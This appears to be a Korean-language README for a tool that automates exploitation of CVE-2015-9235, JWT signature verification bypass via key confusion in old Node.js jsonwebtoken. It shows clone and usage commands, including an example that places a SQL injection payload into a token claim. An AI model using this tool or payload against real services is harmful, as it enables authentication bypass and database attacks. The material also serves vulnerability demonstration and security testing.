
CVE-2015-9235 익스플로잇 자동화
애플리케이션의 소스 코드를 클론하거나 다운로드하세요.
git clone https://github.com/WinDyAlphA/CVE-2015-9235_JWT_key_confusion
cd CVE-2015-9235_JWT_key_confusion
token.txt 파일에는 예제로 사용되는 유효한 JWT 토큰이 포함되어 있습니다. 이 파일을 수정하거나 자신의 토큰으로 교체할 수 있습니다.
적절한 인수와 함께 명령줄을 사용하여 애플리케이션을 실행하세요:
python main.py -t token_path -k key_to_replace -v new_value
-t 또는 --token: 원본 JWT 토큰이 포함된 파일의 경로.
-k 또는 --key: 토큰에서 교체할 키.
-v 또는 --value: 키와 연결할 새 값.
애플리케이션은 업데이트된 키가 포함된 새로운 JWT 토큰을 표시합니다.
python main.py -t token.txt -k user -v "thierry23' and 1=1-- -"
이 애플리케이션은 CVE-2015-9235로 알려진 보안 취약점을 설명하기 위해 제작되었습니다.
Node.js용 jsonwebtoken 모듈의 4.2.2 버전 이전에서는 공격자가 비대칭 키(RS/ES 계열) 알고리즘으로 서명된 토큰의 검증을 우회할 수 있으며, 대신 공격자는 대칭 알고리즘(HS* 계열)으로 서명된 토큰을 전송할 수 있습니다.